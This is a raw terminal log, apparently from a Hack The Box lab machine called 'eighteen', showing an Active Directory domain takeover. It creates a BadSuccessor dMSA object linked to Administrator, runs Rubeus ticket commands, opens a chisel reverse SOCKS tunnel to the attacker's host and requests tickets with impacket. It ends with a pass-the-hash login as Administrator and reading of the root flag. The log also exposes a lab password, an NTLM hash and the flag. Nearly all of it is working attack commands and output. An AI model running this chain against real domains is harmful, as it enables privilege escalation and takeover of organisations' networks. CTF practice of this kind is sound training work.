*Evil-WinRM* PS C:\programdata> ./Badsuccessor.exe escalate -targetOU "OU=Staff,DC=eighteen,DC=htb" -dmsa evil_puck -targetUser "CN=ADMINISTRATOR,CN=USERS,DC=EIGHTEEN,DC=HTB" -dc-ip 10.129.36.212 -dnshostname evil_puck -user adam.scott
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] Creating dMSA object...
[*] Inheriting target user privileges
-> msDS-ManagedAccountPrecededByLink = CN=ADMINISTRATOR,CN=USERS,DC=EIGHTEEN,DC=HTB
-> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
-> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute
[+] Created dMSA 'evil_puck' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=ADMINISTRATOR,CN=USERS,DC=EIGHTEEN,DC=HTB' (DC: 10.129.36.212)
[*] Phase 4: Use Rubeus or Kerbeus BOF to retrieve TGS and Password Hash
-> Step 1: Find luid of krbtgt ticket
Rubeus: .\Rubeus.exe triage
Kerbeus BOF: krb_triage BOF
-> Step 2: Get TGT of Windows 2025/24H2 system with a delegated MSA setup and migration finished.
Rubeus: .\Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap
Kerbeus BOF: krb_dump /luid:<luid>
-> Step 3: Use ticket to get a TGS ( Requires Rubeus PR: https://github.com/GhostPack/Rubeus/pull/194 )
Rubeus: .\Rubeus.exe asktgs /ticket:TICKET_FROM_ABOVE /targetuser:evil_puck$ /service:krbtgt/domain.local /dmsa /dc:<DC hostname> /opsec /nowrap
*Evil-WinRM* PS C:\programdata>
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe triage
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0xc5bba
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
*Evil-WinRM* PS C:\programdata>
┌──(bolke㉿hacky)-[~/htb/eighteen]
└─$ chisel server --reverse -p 8888
2026/04/30 21:32:03 server: Reverse tunnelling enabled
2026/04/30 21:32:03 server: Fingerprint gLwW21gt3i6uaXA5SofVujT9cCWNgkuAxpD5YUxEGS4=
2026/04/30 21:32:03 server: Listening on http://0.0.0.0:8888
2026/04/30 21:49:14 server: session#1: Client version (1.11.5) differs from server version (1.11.5-0kali1)
2026/04/30 21:49:14 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
*Evil-WinRM* PS C:\programdata> .\chisel.exe client 10.10.14.187:8888 R:socks
chisel.exe : 2026/04/30 12:49:56 client: Connecting to ws://10.10.14.187:8888
+ CategoryInfo : NotSpecified: (2026/04/30 12:4....10.14.187:8888:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2026/04/30 12:49:56 client: Connected (Latency 9.8813ms)
┌──(bolke㉿hacky)-[~/htb/eighteen]
└─$ proxychains impacket-getTGT eighteen.htb/'adam.scott:iloveyou1' -dc-ip 10.129.36.212
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.36.212:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.36.212:88 ... OK
[*] Saving ticket in adam.scott.ccache
impacket-ticketConverter adam.scott.ccache adam.scott.kirbi
upload adam.scott.kirbi .
*Evil-WinRM* PS C:\programdata> ./Rubeus.exe ptt /ticket:adam.scott.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Import Ticket
[X] Error 1312 running LsaLookupAuthenticationPackage (ProtocalStatus): A specified logon session does not exist. It may already have been terminated
*Evil-WinRM* PS C:\programdata>
Error: no clue.
Once the box retires, the full walkthrough will be uploaded.
┌──(puck㉿kali)-[~/htb/eighteen]
└─$ evil-winrm -i eighteen.htb -u Administrator -H '0b133be956bfaddf9cea56701affddec'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/12/2026 6:25 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
9d728415de2b940f3f146f6296be66a3
*Evil-WinRM* PS C:\Users\Administrator\desktop>